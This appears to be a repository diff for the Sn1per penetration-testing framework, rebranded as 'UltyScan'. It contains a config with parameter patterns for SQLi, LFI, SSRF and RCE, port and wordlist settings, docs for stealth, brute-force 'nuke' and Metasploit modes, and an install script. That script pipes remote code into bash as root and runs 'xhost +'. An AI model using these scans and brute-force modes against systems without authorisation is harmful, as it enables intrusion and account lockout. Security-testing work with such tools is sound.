GREP_PARAMETERS="template=|preview=|id=|view=|activity=|name=|content=|redirect=|(&|[?])access(&|=)|(&|[?])admin(&|=)|(&|[?])dbg(&|=)|(&|[?])debug(&|=)|(&|[?])edit(&|=)|(&|[?])grant(&|=)|(&|[?])test(&|=)|(&|[?])alter(&|=)|(&|[?])clone(&|=)|(&|[?])create(&|=)|(&|[?])delete(&|=)|(&|[?])disable(&|=)|(&|[?])enable(&|=)|(&|[?])exec(&|=)|(&|[?])execute(&|=)|(&|[?])load(&|=)|(&|[?])make(&|=)|(&|[?])modify(&|=)|(&|[?])rename(&|=)|(&|[?])reset(&|=)|(&|[?])shell(&|=)|(&|[?])toggle(&|=)|(&|[?])adm(&|=)|(&|[?])root(&|=)|(&|[?])cfg(&|=)|(&|[?])dest(&|=)|(&|[?])redirect(&|=)|(&|[?])uri(&|=)|(&|[?])path(&|=)|(&|[?])continue(&|=)|(&|[?])url(&|=)|(&|[?])window(&|=)|(&|[?])next(&|=)|(&|[?])data(&|=)|(&|[?])reference(&|=)|(&|[?])site(&|=)|(&|[?])html(&|=)|(&|[?])val(&|=)|(&|[?])validate(&|=)|(&|[?])domain(&|=)|(&|[?])callback(&|=)|(&|[?])return(&|=)|(&|[?])feed(&|=)|(&|[?])host(&|=)|(&|[?])port(&|=)|(&|[?])to(&|=)|(&|[?])out(&|=)|(&|[?])view(&|=)|(&|[?])dir(&|=)|(&|[?])show(&|=)|(&|[?])navigation(&|=)|(&|[?])open(&|=)|(&|[?])file(&|=)|(&|[?])document(&|=)|(&|[?])folder(&|=)|(&|[?])pg(&|=)|(&|[?])php_path(&|=)|(&|[?])style(&|=)|(&|[?])doc(&|=)|(&|[?])img(&|=)|(&|[?])filename(&|=)|id=|select=|report=|role=|update=|query=|user=|name=|sort=|where=|search=|params=|process=|row=|view=|table=|from=|sel=|results=|sleep=|fetch=|order=|keyword=|column=|field=|delete=|string=|number=|filter=|(&|[?])callback=|(&|[?])cgi-bin/redirect.cgi|(&|[?])checkout=|(&|[?])checkout_url=|(&|[?])continue=|(&|[?])data=|(&|[?])dest=|(&|[?])destination=|(&|[?])dir=|(&|[?])domain=|(&|[?])feed=|(&|[?])file=|(&|[?])file_name=|(&|[?])file_url=|(&|[?])folder=|(&|[?])folder_url=|(&|[?])forward=|(&|[?])from_url=|(&|[?])go=|(&|[?])goto=|(&|[?])host=|(&|[?])html=|(&|[?])image_url=|(&|[?])img_url=|(&|[?])load_file=|(&|[?])load_url=|(&|[?])login_url=|(&|[?])logout=|(&|[?])navigation=|(&|[?])next=|(&|[?])next_page=|(&|[?])Open=|(&|[?])out=|(&|[?])page_url=|(&|[?])path=|(&|[?])port=|(&|[?])redir=|(&|[?])redirect=|(&|[?])redirect_to=|(&|[?])redirect_uri=|(&|[?])redirect_url=|(&|[?])reference=|(&|[?])return=|(&|[?])return_path=|(&|[?])return_to=|(&|[?])returnTo=|(&|[?])return_url=|(&|[?])rt=|(&|[?])rurl=|(&|[?])show=|(&|[?])site=|(&|[?])target=|(&|[?])to=|(&|[?])uri=|(&|[?])url=|(&|[?])val=|(&|[?])validate=|(&|[?])view=|(&|[?])window=|daemon=|upload=|dir=|execute=|download=|log=|ip=|cli=|cmd=|file=|document=|folder=|root=|path=|pg=|style=|pdf=|template=|php_path=|doc=|page=|name=|id=|user=|account=|number=|order=|no=|doc=|key=|email=|group=|profile=|edit=|report=|access=|admin=|dbg=|debug=|edit=|grant=|test=|alter=|clone=|create=|delete=|disable=|enable=|exec=|execute=|load=|make=|modify=|rename=|reset=|shell=|toggle=|adm=|root=|cfg=|config="
GREP_XSS="q=|s=|search=|lang=|keyword=|query=|page=|keywords=|year=|view=|email=|type=|name=|p=|callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|id=|item=|page_id=|month=|immagine=|list_type=|url=|terms=|categoryid=|key=|l=|begindate=|enddate="
GREP_SSRF="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|reference|site|html|val|validate|domain|callback|return|page|feed|host|port|to|out|view|dir|show|navigation|open"
GREP_REDIRECT="forward=|dest=|redirect=|uri=|path=|continue=|url=|window=|to=|out=|view=|dir=|show=|navigation=|Open=|file=|val=|validate=|domain=|callback=|return=|page=|feed=|host=|port=|next=|data=|reference=|site=|html="
GREP_RCE="daemon|upload|dir|execute|download|log|ip|cli|cmd"
GREP_IDOR="id|user|account|number|order|no|doc|key|email|group|profile|edit|report"
GREP_SQL="id|select|report|role|update|query|user|name|sort|where|search|params|process|row|view|table|from|sel|results|sleep|fetch|order|keyword|column|field|delete|string|number|filter"
GREP_LFI="file|document|folder|root|path|pg|style|pdf|template|php_path|doc"
GREP_SSTI="template|preview|id|view|activity|name|content|redirect"
GREP_DEBUG="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|config"
# DOMAIN WORDLISTS
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
# DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
# DEFAULT USER/PASS WORDLISTS
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
# TOOL DIRECTORIES
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
# FLYOVER MODE TUNING
FLYOVER_MAX_HOSTS="5"
FLYOVER_DELAY="10"
# NMAP OPTIONS
NMAP_OPTIONS="--script-args http.useragent='' --open"
# NMAP PORT CONFIGURATIONS
QUICK_PORTS="21,22,80,443,8000,8080,8443"
DEFAULT_PORTS="10000,1099,110,111,123,135,137,139,1433,1524,161,162,16992,2049,21,2121,2181,22,23,25,264,27017,27018,27019,28017,3128,3306,3310,3389,3632,389,443,4443,445,49152,49180,500,512,513,514,53,5432,5555,5800,5900,5984,623,624,6667,67,68,69,7001,79,80,8000,8001,8080,8180,8443,8888,9200,9495"
FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
THREADS="100"
# NETWORK PLUGINS
NMAP_SCRIPTS="1"
METASPLOIT_EXPLOIT="1"
MSF_LEGACY_WEB_EXPLOITS="0"
SSH_AUDIT="1"
SSH_ENUM="1"
LIBSSH_BYPASS="1"
SMTP_USER_ENUM="1"
FINGER_TOOL="1"
SHOW_MOUNT="1"
RPC_INFO="1"
SMB_ENUM="1"
AMAP="0"
# OSINT PLUGINS
WHOIS="1"
GOOHAK="1"
INURLBR="1"
THEHARVESTER="1"
METAGOOFIL="1"
HUNTERIO="0"
TOMBAIO="0"
INTODNS="1"
EMAILFORMAT="1"
ULTRATOOLS="1"
URLCRAZY="1"
VHOSTS="0"
H8MAIL="0"
GITHUB_SECRETS="0"
URLSCANIO="1"
# DYNAMIC APPLICATION SCANNERS
BURP_SCAN="0"
ARACHNI_SCAN="0"
ZAP_SCAN="1"
# ACTIVE WEB PLUGINS
SC0PE_VULNERABLITY_SCANNER="1"
DIRSEARCH="1"
GOBUSTER="0"
NIKTO="0"
BLACKWIDOW="1"
INJECTX="1"
CLUSTERD="0"
WPSCAN="0"
CMSMAP="0"
WAFWOOF="1"
WHATWEB="1"
WIG="0"
SHOCKER="0"
JEXBOSS="0"
WEBTECH="1"
SSL_INSECURE="1"
HTTP_PROBE="0"
SMUGGLER="1"
# PASSIVE WEB PLUGINS
WAYBACKMACHINE="1"
SSL="1"
PASSIVE_SPIDER="1"
GAU="1"
HACKERTARGET="1"
CUTYCAPT="0"
WEBSCREENSHOT="1"
# EMAIL PLUGINS
SPOOF_CHECK="1"
# RECON PLUGINS
SUBHIJACK_CHECK="0"
AQUATONE="0"
SLURP="0"
SUBLIST3R="0"
AMASS="0"
SUBFINDER="0"
DNSCAN="0"
CRTSH="1"
SUBOVER="0"
PROJECT_SONAR="1"
CENSYS_SUBDOMAINS="0"
SUBNET_RETRIEVAL="1"
SUBJACK="0"
ALT_DNS="0"
MASS_DNS="0"
DNSGEN="0"
SHODAN="0"
ASN_CHECK="1"
SPYSE="0"
SUBBRUTE_DNS="0"
GITHUB_SUBDOMAINS="0"
RAPIDDNS="1"
SCAN_ALL_DISCOVERED_DOMAINS="0"

218
conf/fast_service_portscan Normal file
View File

File diff suppressed because one or more lines are too long

214
conf/super_stealth_mode Normal file
View File

File diff suppressed because one or more lines are too long

214
conf/super_stealth_mode_OSINT Normal file
View File

File diff suppressed because one or more lines are too long

214
conf/web_mode_all_plugins Normal file
View File

File diff suppressed because one or more lines are too long

212
conf/webpwn_only Normal file
View File

File diff suppressed because one or more lines are too long

212
conf/webpwn_only_metasploit_disabled Normal file
View File

File diff suppressed because one or more lines are too long

219
conf/zap_only_webscan Normal file
View File

File diff suppressed because one or more lines are too long

14
docker-compose-blackarch.yml Normal file
View File

@@ -0,0 +1,14 @@
version: '3.9'
x-logging: &default-logging
options:
max-size: "40m"
max-file: "10"
driver: json-file
services:
blackarch:
container_name: blackarch
build:
context: .
dockerfile: Dockerfile.blackarch

14
docker-compose.yml Normal file
View File

@@ -0,0 +1,14 @@
version: '3.9'
x-logging: &default-logging
options:
max-size: "40m"
max-file: "10"
driver: json-file
services:
kali-linux:
container_name: kali-linux
build:
context: .
dockerfile: Dockerfile

72
docs/configuration.md Normal file
View File

@@ -0,0 +1,72 @@
# Configuration Guide
**UltyScan** is highly configurable. You can adjust scan intensity, timeout settings, and integrate external API keys for enhanced data gathering.
## Main Configuration File
The main configuration file is located at:
`/usr/share/sniper/sniper.conf`
To use a custom configuration for a specific scan, make a copy of this file, edit it, and pass it with the `-c` flag:
```bash
cp /usr/share/sniper/sniper.conf ~/my_custom.conf
nano ~/my_custom.conf
# Edit settings...
sudo sniper -c ~/my_custom.conf -t example.com
```
### Common Settings to Tweak
- **`sc0pe_vulnerable_search`**: Set to `1` to search for specific vulnerabilities.
- **`RISK_LEVEL`**: Adjust the sensitivity of vulnerability scanners.
- **`THREADS`**: Increase number of threads for faster (but noisier) scans.
---
## API Integration
To unlock the full power of **UltyScan**, you should configure API keys for services like Shodan, Censys, and Hunter.io.
### Setting up Keys
1. **Locate or Create the Key Config**:
The system looks for keys in `/root/.sniper_api_keys.conf`.
2. **Edit the File**:
```bash
sudo nano /root/.sniper_api_keys.conf
```
3. **Enter your Keys**:
Add or update the lines for the services you have access to.
```bash
# SHODAN API KEY
SHODAN_API_KEY="your_shodan_key_here"
# CENSYS API KEY
CENSYS_API_ID="your_censys_id"
CENSYS_API_SECRET="your_censys_secret"
# HUNTER.IO API KEY
HUNTER_API_KEY="your_hunter_key"
# GITHUB API KEY
GITHUB_API_KEY="your_github_token"
```
4. **Save and Exit**:
Press `Ctrl+X`, then `Y`, then `Enter`.
### Supported Integrations
- **Shodan**: For discovering internet-connected devices.
- **Censys**: For attack surface visibility.
- **Hunter.io**: For email and contact discovery.
- **GitHub**: For repo scanning and updates.
- **OWASP ZAP**: For web application scanning.
- **BurpSuite Pro**: For advanced web scanning (requires manual config).
- **Metasploit**: For exploit validation.
---
[Return to README](../README.md)

127
docs/installation.md Normal file
View File

@@ -0,0 +1,127 @@
# Installation Guide
Welcome to the **UltyScan** installation guide. This document provides step-by-step instructions to get **UltyScan** up and running on your system.
## Table of Contents
1. [Prerequisites](#prerequisites)
2. [Native Installation (Kali Linux / Ubuntu / Debian)](#native-installation)
3. [Docker Installation (Recommended for others)](#docker-installation)
4. [Troubleshooting](#troubleshooting)
---
## Prerequisites
Before installing, ensure you have:
- **Operating System**: Kali Linux (preferred), Ubuntu, Debian, or Parrot OS.
- **Permissions**: Root (administrator) access is required. Use `sudo` if you are not logged in as root.
- **Internet Connection**: Required to download dependencies.
---
## Native Installation
This is the standard installation method for Kali Linux, Ubuntu, and Debian systems.
### Step 1: Clone the Repository
Open your terminal (command prompt) and run the following command to download the **UltyScan** code to your computer.
```bash
git clone https://github.com/1N3/Sn1per
```
*Note: This creates a folder named `Sn1per`. You can rename it to `UltyScan` if you wish, but the internal scripts expect standard paths.*
### Step 2: Navigate to the Directory
Move into the downloaded folder:
```bash
cd Sn1per
```
### Step 3: Run the Installer
Run the installation script. This script will automatically download and install all necessary tools and dependencies.
**Warning**: This process can take a while (10-30 minutes) depending on your internet speed, as it installs many security tools.
```bash
sudo bash install.sh
```
### Step 4: Verification
Once the script finishes, verify the installation by running the scanner's help command:
```bash
sudo sniper --help
```
If you see the help menu with the logo, the installation was successful!
---
## Docker Installation
If you are not using Kali/Debian, or prefer a containerized environment, use Docker. This keeps your host system clean.
### Prerequisites
- Ensure **Docker** and **Docker Compose** are installed on your system.
- [Install Docker Engine](https://docs.docker.com/engine/install/)
- [Install Docker Compose](https://docs.docker.com/compose/install/)
### Option A: Kali Linux Container (Recommended)
1. **Start the container**:
From within the `Sn1per` directory, run:
```bash
sudo docker compose up -d
```
*The `-d` flag runs it in the background.*
2. **Access the container**:
To start using the scanner, enter the interactive shell:
```bash
sudo docker run --privileged -it sn1per-kali-linux /bin/bash
```
3. **Run the tool**:
Inside the container, you can run:
```bash
sniper --help
```
### Option B: BlackArch Container
If you prefer BlackArch Linux:
1. **Start the container**:
```bash
sudo docker compose -f docker-compose-blackarch.yml up -d
```
2. **Access the container**:
```bash
sudo docker run --privileged -it sn1per-blackarch /bin/bash
```
---
## Troubleshooting
### "Command not found"
If running `sniper` says command not found:
- Ensure you ran the install script as root (`sudo bash install.sh`).
- Try running it directly from the installation directory:
```bash
cd /usr/share/sniper
./sniper --help
```
### Dependency Errors
If the installer fails on a specific package:
1. Run `sudo apt update --fix-missing`
2. Run `sudo apt upgrade`
3. Re-run `./install.sh`
### Docker "Permission Denied"
If you get permission errors with Docker, ensure your user is in the `docker` group or use `sudo` before docker commands.
---
[Return to README](../README.md)

130
docs/usage.md Normal file
View File

@@ -0,0 +1,130 @@
# Usage Guide
This guide covers how to use **UltyScan** effectively. The tool works by running the `sniper` command followed by a target and a mode.
## Basic Syntax
```bash
sudo sniper -t <TARGET> -m <MODE> [OPTIONS]
```
- `-t <TARGET>`: The domain (e.g., `example.com`) or IP address (e.g., `192.168.1.1`) you want to scan.
- `-m <MODE>`: The scanning mode (e.g., `normal`, `stealth`, `nuke`). if omitted, defaults to normal.
- `-w <WORKSPACE>`: (Optional) Save results to a specific workspace name.
---
## Scanning Modes
### 1. Normal Mode
**Best for:** General purpose scanning.
Performs a basic scan of targets and open ports using both active and passive checks. It balances speed and depth.
**Command:**
```bash
sudo sniper -t example.com
```
*Note: If no mode is specified, Normal mode is used.*
### 2. Stealth Mode
**Best for:** Avoiding detection.
Quickly enumerates targets using mostly non-intrusive scans to avoid WAF (Web Application Firewall) or IPS (Intrusion Prevention System) blocking.
**Command:**
```bash
sudo sniper -t example.com -m stealth
```
### 3. Flyover Mode
**Best for:** High-level overview of multiple targets.
Fast, multi-threaded scans of multiple targets. Great for collecting high-level data (like taking screenshots of web pages) on many hosts quickly.
**Command:**
```bash
sudo sniper -f targets.txt -m flyover -w my-flyover-scan
```
### 4. Airstrike Mode
**Best for:** Quick enumeration of a list of targets.
Quickly enumerates open ports and services on multiple hosts and performs basic fingerprinting.
**Command:**
```bash
sudo sniper -f targets.txt -m airstrike
```
*Note: `targets.txt` should contain a list of IPs or domains, one per line.*
### 5. Nuke Mode
**Best for:** COMPLETE DESTRUCTION (Deep Audit).
Launches a full audit of multiple hosts. This enables Brute-force, Full Port Scan, OSINT, Recon, Workspace, and Loot collection. **This is very loud and will likely lock accounts or trigger alarms.**
**Command:**
```bash
sudo sniper -f targets.txt -m nuke -w my-nuke-scan
```
### 6. Discover Mode
**Best for:** Internal Networks.
Parses all hosts on a subnet (CIDR) and initiates a scan against each active host.
**Command:**
```bash
sudo sniper -t 192.168.1.0/24 -m discover -w internal-scan
```
### 7. Web Mode
**Best for:** Web Application focus.
Adds full automatic web application scans to the results. Scans ports 80 (HTTP) and 443 (HTTPS) only.
**Command:**
```bash
sudo sniper -t example.com -m web
```
---
## Workspace Management
UltyScan saves all data into "Workspaces" to keep your scans organized.
### Creating/Using a Workspace
Simply add `-w <NAME>` to any command.
```bash
sudo sniper -t example.com -w project-alpha
```
### Listing Workspaces
See all your current workspaces.
```bash
sudo sniper --list
```
### Deleting a Workspace
Remove a workspace and all its data.
```bash
sudo sniper -w project-alpha -d
```
### Viewing Reports
To open the HTML report for a workspace:
```bash
sudo sniper --list
```
Then select the report HTML file from the output or navigate to:
`/usr/share/sniper/loot/workspace/<YOUR_WORKSPACE>/sniper-report.html`
---
## Advanced Options
| Flag | Description |
| :--- | :--- |
| `-o` / `--osint` | Enable OSINT (Open Source Intelligence) gathering. |
| `-re` / `--recon` | Enable Reconnaissance gathering. |
| `-b` | Enable Brute-force attacks (automatically tries passwords). |
| `-fp` | Full Port Only scan (scans all 65535 ports). |
| `--status` | Check the status of running scans. |
| `-u` / `--update` | Update **UltyScan** to the latest version. |
---
[Return to README](../README.md)

467
install.sh Normal file
View File

@@ -0,0 +1,467 @@
#!/bin/bash
# Install script for Sn1per CE
# Created by @xer0dayz - https://sn1persecurity.com
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[ https://sn1persecurity.com $RESET"
echo -e "$OKORANGE + -- --=[ Sn1per CE by @xer0dayz $RESET"
echo ""
INSTALL_DIR=/usr/share/sniper
LOOT_DIR=/usr/share/sniper/loot
PLUGINS_DIR=/usr/share/sniper/plugins
GO_DIR=~/go/bin
echo -e "$OKRED[>]$RESET This script will install Sn1per under $INSTALL_DIR. Are you sure you want to continue? (Hit Ctrl+C to exit)$RESET"
if [[ "$1" != "force" ]]; then
read answer
fi
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
mkdir -p $INSTALL_DIR 2> /dev/null
chmod 755 -Rf $INSTALL_DIR 2> /dev/null
chown root $INSTALL_DIR/sniper 2> /dev/null
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/osint 2> /dev/null
cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
sudo cp -a /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
sudo cp -a /home/$USER/.Xauthority /root/.Xauthority 2> /dev/null
sudo cp -a /home/kali/.Xauthority /root/.Xauthority 2> /dev/null
sudo chown root: /root/.Xauthority 2> /dev/null
XAUTHORITY=/root/.Xauthority
# CHECK FOR UBUNTU...
UBUNTU_CHECK=$(egrep DISTRIB_ID /etc/lsb-release 2> /dev/null)
if [[ $UBUNTU_CHECK == "DISTRIB_ID=Ubuntu" ]]; then
cp /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
cp -a /run/user/1000/gdm/Xauthority /root/.Xauthority 2> /dev/null
cp -a /home/user/.Xauthority /root/.Xauthority 2> /dev/null
chown root /root/.Xauthority 2> /dev/null
XAUTHORITY=/root/.Xauthority 2> /dev/null
snap install chromium 2> /dev/null
ln -s /snap/bin/chromium /usr/bin/chromium 2> /dev/null
xhost + 2> /dev/null
mkdir -p /run/user/0 2> /dev/null
add-apt-repository ppa:longsleep/golang-backports
sudo apt update
apt install golang
fi
echo -e "$OKBLUE[*]$RESET Installing base dependencies...$RESET"
apt install -y sudo gpg curl
echo -e "$OKBLUE[*]$RESET Updating repositories... $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
curl -fsSL https://archive.kali.org/archive-key.asc | sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/kali.gpg --yes
echo -e "$OKBLUE[*]$RESET Installing package dependencies...$RESET"
apt update
apt install -y nfs-common
apt install -y nodejs
apt install -y wafw00f
apt install -y xdg-utils
apt install -y ruby
apt install -y rubygems
apt install -y python2
apt install -y python3
apt install -y python3-paramiko
apt purge -y python3-pip
apt install -y python3-pip
apt install -y dos2unix
apt install -y aha
apt install -y libxml2-utils
apt install -y rpcbind
apt install -y cutycapt
apt install -y host
apt install -y whois
apt install -y dnsrecon
apt install -y curl
apt install -y nmap
apt install -y php8.2
apt install -y php8.2-curl
apt install -y hydra
apt install -y sqlmap
apt install -y nbtscan
apt install -y nikto
apt install -y whatweb
apt install -y sslscan
apt install -y jq
apt install -y golang
apt install -y adb
apt install -y xsltproc
apt install -y ldapscripts
apt install -y libssl-dev 2> /dev/null
apt install -y xmlstarlet
apt install -y net-tools
apt install -y p7zip-full
apt install -y jsbeautifier
apt install -y theharvester 2> /dev/null
apt install -y phantomjs 2> /dev/null
apt install -y chromium 2> /dev/null
apt install -y xvfb
apt install -y urlcrazy
apt install -y iputils-ping
apt install -y enum4linux
apt install -y dnsutils
apt install -y wtmpdb
echo -e "$OKBLUE[*]$RESET Installing Metasploit...$RESET"
rm -f /usr/share/keyrings/metasploit-framework.gpg 2> /dev/null
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall
chmod 755 /tmp/msfinstall
/tmp/msfinstall
pip3 install dnspython colorama tldextract urllib3 ipaddress requests --break-system-packages
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
echo -e "$OKBLUE[*]$RESET Installing gem dependencies...$RESET"
gem install rake 2> /dev/null > /dev/null
gem install ruby-nmap 2> /dev/null > /dev/null
gem install net-http-persistent 2> /dev/null > /dev/null
gem install mechanize 2> /dev/null > /dev/null
gem install text-table 2> /dev/null > /dev/null
gem install public_suffix 2> /dev/null > /dev/null
echo -e "$OKBLUE[*]$RESET Setting up Ruby...$RESET"
dpkg-reconfigure ruby
echo -e "$OKBLUE[*]$RESET Upgrading Pip...$RESET"
python3 -m pip install --upgrade pip --break-system-packages
echo -e "$OKBLUE[*]$RESET Cleaning up old extensions...$RESET"
rm -Rf $PLUGINS_DIR 2> /dev/null
mkdir $PLUGINS_DIR 2> /dev/null
cd $PLUGINS_DIR
mkdir -p $GO_DIR 2> /dev/null
echo -e "$OKBLUE[*]$RESET Downloading extensions...$RESET"
# SUBLIST3R INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Sublist3r...$RESET"
git clone https://github.com/1N3/Sublist3r.git
# SHOCKER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Shocker...$RESET"
git clone https://github.com/nccgroup/shocker.git
# SSH-AUDIT INSTALLER
echo -e "$OKBLUE[*]$RESET Installing SSH-Audit...$RESET"
git clone https://github.com/arthepsy/ssh-audit
# JEXBOSS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Jexboss...$RESET"
git clone https://github.com/1N3/jexboss.git
# WIG INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Wig...$RESET"
git clone https://github.com/jekyc/wig.git
# CORSTEST INSTALLER
echo -e "$OKBLUE[*]$RESET Installing CORStest...$RESET"
git clone https://github.com/RUB-NDS/CORStest.git
# VULSCAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Vulscan...$RESET"
git clone https://github.com/scipag/vulscan
# METAGOOFIL INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Metagoofil...$RESET"
git clone https://github.com/laramies/metagoofil.git
# SHODAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Shodan...$RESET"
git clone https://github.com/achillean/shodan-python
# CMSMAP INSTALLER
echo -e "$OKBLUE[*]$RESET Installing CMSMap...$RESET"
git clone https://github.com/Dionach/CMSmap.git
# SMUGGLER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Smuggler...$RESET"
git clone https://github.com/defparam/smuggler.git
# DIRSEARCH INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Dirsearch...$RESET"
cd $PLUGINS_DIR
rm -Rf dirsearch/ 2> /dev/null
wget https://github.com/maurosoria/dirsearch/archive/refs/tags/v0.4.2.tar.gz
tar -zxvf v0.4.2.tar.gz
mv dirsearch-0.4.2/ dirsearch/
cd dirsearch/
pip3 install -r requirements.txt --break-system-packages
cd $PLUGINS_DIR
# SECRETFINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing SecretFinder...$RESET"
git clone https://github.com/m4ll0k/SecretFinder.git secretfinder
pip install -r $PLUGINS_DIR/secretfinder/requirements.txt --break-system-packages
# LINKFINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing LinkFinder...$RESET"
git clone https://github.com/1N3/LinkFinder
cd LinkFinder
python3 setup.py install
cd ..
# GITGRABER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GitGrabber...$RESET"
git clone https://github.com/hisxo/gitGraber.git
pip3 install -r $PLUGINS_DIR/gitGraber/requirements.txt --break-system-packages 2> /dev/null
# CENSYS-SUBDOMAIN-FINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Censys-Subdomain-Finder...$RESET"
git clone https://github.com/christophetd/censys-subdomain-finder.git
pip3 install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt --break-system-packages
# DNSCAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing DNScan...$RESET"
git clone https://github.com/rbsec/dnscan.git
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt --break-system-packages
# ALTDNS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing AltDNS...$RESET"
git clone https://github.com/infosec-au/altdns.git
cd altdns
pip3 install -r requirements.txt --break-system-packages
python3 setup.py install
pip3 install py-altdns --break-system-packages
cd ..
# MASSDNS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing MassDNS...$RESET"
git clone https://github.com/blechschmidt/massdns.git
cd massdns
make && make install
cd ..
# DNSGEN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing DNSGen...$RESET"
git clone https://github.com/ProjectAnte/dnsgen
cd dnsgen
pip3 install -r requirements.txt --break-system-packages
python3 setup.py install
cd ..
# NUCLEI UPDATES
echo -e "$OKBLUE[*]$RESET Installing Nuclei...$RESET"
GO111MODULE=on go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
ln -fs /root/go/bin/nuclei /usr/local/bin/nuclei 2> /dev/null
nuclei --update
nuclei
# INSTALL WEBTECH
echo -e "$OKBLUE[*]$RESET Installing WebTech...$RESET"
pip3 install -U webtech --break-system-packages
mkdir -p /root/.local/share/webtech
# INSTALL SUBJACK
echo -e "$OKBLUE[*]$RESET Installing SubJack...$RESET"
cd ~/go/bin/;go install github.com/haccer/subjack@latest
# INSTALL SUBOVER
echo -e "$OKBLUE[*]$RESET Installing SubOver...$RESET"
cd ~/go/bin/;go install github.com/Ice3man543/SubOver@latest; mv /root/go/bin/SubOver /usr/local/bin/subover
# INSTALL FPROBE
echo -e "$OKBLUE[*]$RESET Installing FProbe...$RESET"
go install github.com/theblackturtle/fprobe@latest; ln -fs ~/go/bin/fprobe /usr/bin/fprobe
# INSTALL ASNIP
echo -e "$OKBLUE[*]$RESET Installing ASnip...$RESET"
go install github.com/harleo/asnip@latest; ln -fs ~/go/bin/asnip /usr/bin/asnip
# GAU INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GAU...$RESET"
GO111MODULE=on go install github.com/lc/gau@latest
rm -f /usr/bin/gau 2> /dev/null
ln -fs /root/go/bin/gau /usr/bin/gau 2> /dev/null
# INSTALL HTTPX
echo -e "$OKBLUE[*]$RESET Installing HTTPX...$RESET"
go install github.com/projectdiscovery/httpx@latest; ln -fs /root/go/bin/httpx /usr/bin/httpx
# INSTALL FFUF
echo -e "$OKBLUE[*]$RESET Installing FFuF...$RESET"
go install github.com/ffuf/ffuf@latest; ln -fs /root/go/bin/ffuf /usr/bin/ffuf
# GITHUB-ENDPOINTS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Github-Endpoints...$RESET"
go install github.com/gwen001/github-endpoints@latest; ln -fs /root/go/bin/github-endpoints /usr/bin/github-endpoints
# PUREDNS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing PureDNS...$RESET"
go install github.com/d3mondev/puredns/v2@latest; ln -fs /root/go/bin/puredns /usr/bin/puredns
# AMASS INSTALLER
echo -e "$OKBLUE[*]$RESET Installing AMass...$RESET"
go install -v github.com/OWASP/Amass/v3/...@master
cd /root/go/bin/
# SUBFINDER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing SubFinder...$RESET"
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; ln -fs /root/go/bin/subfinder /usr/local/bin/subfinder
# DIRDAR INSTALLER
echo -e "$OKBLUE[*]$RESET Installing DirDar...$RESET"
go install github.com/1N3/dirdar@latest; ln -fs /root/go/bin/dirdar /usr/local/bin/dirdar
# VULNERS NMAP INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Vulners...$RESET"
cd /usr/share/nmap/scripts/
rm -f /usr/share/nmap/scripts/vulners.nse
wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
